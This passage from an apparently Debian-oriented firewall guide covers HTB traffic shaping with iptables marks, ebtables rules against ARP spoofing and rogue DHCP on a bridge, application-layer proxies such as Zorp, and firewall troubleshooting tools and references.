Now you should see the packet count increasing when pinging from machines on the private network to a site on the Internet. Check that the packet count of class 1:10 is increasing with:

tc -s class show dev eth0
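As an added example (not code from the original page), the script below builds the tc and iptables commands that tie the 0x1 mark set above to an HTB class 1:10 on the egress interface and computes what is left for a bulk class 1:20; the interface name, the rates and the 1:20 class are assumptions.

```shell
#!/bin/sh
# Added example, not from the original page: generate the tc/iptables commands
# that give fwmark-marked (ICMP) traffic its own HTB class 1:10 on the egress
# device, with everything else falling into a bulk class 1:20.
# Assumptions: device name, rates (kbit/s) and the 1:20 class are invented here.
# Usage: qos_commands eth0 0x1 10000 2000 | sudo sh
# The mark set in PREROUTING stays attached to the packet, so the fw filter on
# the outbound device sees it after routing.

qos_commands() {
    dev="$1"        # egress device, e.g. eth0
    mark="$2"       # fwmark written by the mangle rules, e.g. 0x1
    total="$3"      # link rate for the root class, kbit/s
    marked="$4"     # guaranteed rate for the marked class, kbit/s
    case "$total:$marked" in
        *[!0-9:]*|:*|*:) echo "qos_commands: rates must be integers (kbit/s)" >&2; return 1 ;;
    esac
    [ "$marked" -lt "$total" ] || { echo "qos_commands: marked rate must be below total" >&2; return 1; }
    bulk=$((total - marked))    # what the bulk class 1:20 is guaranteed
    cat <<EOF
tc qdisc del dev $dev root 2>/dev/null || true
tc qdisc add dev $dev root handle 1: htb default 20
tc class add dev $dev parent 1: classid 1:1 htb rate ${total}kbit
tc class add dev $dev parent 1:1 classid 1:10 htb rate ${marked}kbit ceil ${total}kbit prio 1
tc class add dev $dev parent 1:1 classid 1:20 htb rate ${bulk}kbit ceil ${total}kbit prio 2
tc filter add dev $dev parent 1: protocol ip prio 1 handle $mark fw flowid 1:10
iptables -t mangle -A PREROUTING -p icmp -j MARK --set-mark $mark
iptables -t mangle -A PREROUTING -p icmp -j RETURN
EOF
}
```

After applying, "tc -s class show dev eth0" as above shows the per-class counters, so a ping from the private network should increment class 1:10 only.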


Ethernet Firewall Security

Introduction

Ebtables is used to set up, maintain, and inspect the tables of Ethernet frame rules in the Linux kernel. It is analogous to iptables, but operates at the MAC (link) layer, on Ethernet frames and ARP, rather than at the IP layer.

If you need to filter or translate ARP traffic (at the link layer), or your firewall has bridged interfaces (for example a transparent bridge between an OpenVPN-tunneled VLAN and a local VLAN, or bridged interfaces for virtualization), ebtables(8) is your friend.

The design is very similar to netfilter's iptables.

It manages rulesets in tables with chains and targets, using user space tools, but this time it's not in the default Debian installation, and you need to add it:

aptitude install ebtables

There are documents that explain howto integrate ebtables and iptables, using the iptables module physdev.
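As an added example (not code from the original page), the script below generates ebtables rules for a bridge that drop frames entering from the LAN port which claim the gateway's IP address with any other MAC, the kind of ARP poisoning shown with ettercap above, together with an iptables physdev rule that blocks DHCP server replies arriving from that port. The LAN port name is an assumption; the gateway IP and MAC are the lab values from the ettercap output above, and the legitimate DHCP server is assumed not to sit behind the LAN port.

```shell
#!/bin/sh
# Added example, not from the original page: ebtables rules for a bridge that
# drop ARP and IPv4 frames from the LAN port claiming the gateway's IP with a
# foreign MAC, plus an iptables physdev rule dropping DHCP server replies that
# arrive on the LAN port (rogue DHCP server).
# Assumptions: LAN-facing bridge port eth1, gateway 192.168.0.1 at
# 08:00:27:14:28:ce (lab values from this page), real DHCP server elsewhere.
# Usage: bridge_rules eth1 192.168.0.1 08:00:27:14:28:ce | sudo sh
# Caveat: a host cloning both the gateway MAC and IP cannot be told apart at
# this layer; that needs switch port security rather than a bridge filter.

is_mac() {
    # exactly six colon-separated hex octets, case-insensitive
    _h='[0-9a-fA-F][0-9a-fA-F]'
    case "$1" in
        $_h:$_h:$_h:$_h:$_h:$_h) return 0 ;;
    esac
    return 1
}

bridge_rules() {
    lan_port="$1"; gw_ip="$2"; gw_mac="$3"
    is_mac "$gw_mac" || { echo "bridge_rules: bad MAC '$gw_mac'" >&2; return 1; }
    # bridge-nf-call-iptables makes bridged frames visible to the iptables
    # FORWARD chain (needs the br_netfilter module on newer kernels).
    cat <<EOF
sysctl -w net.bridge.bridge-nf-call-iptables=1
ebtables -F FORWARD
ebtables -A FORWARD -i $lan_port -p ARP --arp-ip-src $gw_ip -s ! $gw_mac --log-level info --log-prefix "ARP-SPOOF " -j DROP
ebtables -A FORWARD -i $lan_port -p IPv4 --ip-src $gw_ip -s ! $gw_mac -j DROP
iptables -A FORWARD -m physdev --physdev-in $lan_port -p udp --sport 67 --dport 68 -j DROP
EOF
}
```

Dropped frames are logged with the ARP-SPOOF prefix, which gives the kernel log a line to alert on when a poisoning attempt is made behind the bridge.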


Application Firewall Security

Summary

To go further up the stack and work at Layer 7 of the OSI model, defining rules at the application level, you need other tools.

For example, you open port 80 to your users, but you don't want them to be able to download .exe files from the Internet. For that you need an application firewall or proxy.

The default kernel in Debian does not have layer 7 patches, but you can install user space proxies to handle this kind of filtering.

There are options such as Squid, DansGuardian, Zorp, etc.

Zorp is written in Python and has been in Debian since 5.0.

See also the links section for the l7-filter project.


Troubleshooting software and tips

Some helpful (and must-have) tools are:

ip(8): (package: iproute) to list interfaces, addresses, route tables, etc.

nc(1): (package: netcat) to test TCP and UDP connections, open ports, etc.

ping(8): to test ICMP traffic (not tcp or udp).

tail(1): and other tools to monitor logs.

tcpdump(8): (package: tcpdump) to monitor "raw" packets, traffic, etc. using filters and regular expressions.

It's very easy to lose connectivity when first configuring a firewall, and the more complex the firewall, the easier it is.

A basic skill for troubleshooting a firewall problem is knowing the points where traffic passes, is translated, routed or can be rejected, and knowing how to monitor those points to see what is happening.

The most effective approach is to analyze the traffic end to end: the initial request, the DNS lookup, the interfaces it must pass through, the translations that apply, the logs of rejected traffic, the routing rules, etc.

A common trick when designing a ruleset on a remote machine is to set up a cron task that flushes the rules every few minutes, so that a mistake does not lock you out. Since "iptables -F" does not touch the chain policies, the task must also set them back to ACCEPT, and it must be removed once the ruleset is final, because a flushed firewall accepts everything.


References

http://ipset.netfilter.org/iptables.man.html

Ubuntu Firewall community

ufw

Iptables HowTo

https://wiki.archlinux.de/?title=Firewall

http://oceanpark.com/notes/firewall_example.html

http://easyfwgen.morizot.net/gen/index.php


http://www.ossramblings.com/node?page=13

http://www.aczoom.com/blockhosts/download

http://blog.andrew.net.au/2005/02/16#ipt_recent_and_ssh_attacks

save the configuration using /etc/init.d/iptables save.

http://www.josefassad.com/iptables_rate_limit_module


Continue to the Service Security...